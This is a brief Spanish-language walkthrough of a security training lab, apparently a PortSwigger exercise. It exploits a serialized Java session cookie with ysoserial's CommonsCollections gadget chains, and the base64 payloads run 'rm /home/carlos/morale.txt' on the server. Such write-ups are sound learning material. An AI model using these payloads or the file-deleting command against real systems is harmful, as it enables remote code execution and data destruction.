LAB

Haciendo uso de las credenciales proporcionadas y luego interceptar las solicitudes podemos observar que el valor de la cookie esta serializada:

Pero a diferencia de las anteriores, no se puede en texto plano. Por lo que usaremos ysoserial para poder crear un serializado y ejecutar comandos.

• https://github.com/frohoff/ysoserial/releases

Al querer generar nuestro serializado observaremos que este da un error.

El error es porque en mi OS tengo instalado java en la version 17 y 22:

sudo update-alternatives --config java

Así mismo en mi OS tengo instalado sdk, por lo que en mi caso usaré la versión de sdk. Para lo que instalaremos la versión 8.0.412-tem

sdk install java 8.0.412-tem
sdk use java 8.0.412-tem

Luego ejecutaremos y generaremos nuestros serializado.

❯ java -jar ysoserial-all.jar CommonsCollections1 "rm /home/carlos/morale.txt" | base64 -w 0; echo

Al probar el serializado generado con el payload CommonsCollections1, este no logra ejecutar el comando.

Por lo que probando vemos que el payload CommonsCollections4 logra ejecutar comandos al agregar a la cookie de la sesión en el navegador:

❯ java -jar ysoserial-all.jar CommonsCollections4 "rm /home/carlos/morale.txt" | base64 -w 0; echo